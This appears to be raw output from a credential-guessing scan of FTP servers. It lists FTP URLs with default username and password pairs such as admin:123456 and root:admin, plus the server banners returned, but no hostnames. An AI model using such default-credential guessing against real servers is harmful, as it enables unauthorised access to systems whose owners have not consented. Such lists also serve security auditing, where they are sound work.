ftp://admin:123456@ banner: Microsoft FTP Service
ftp://admin:123456@ banner: Microsoft FTP Service
ftp://Administrator:password@ banner: Microsoft FTP Service
ftp://root:admin@ banner: Welcome to the update FTP server v1.0.
ftp://root:admin@ banner: Welcome to the update FTP server v1.0.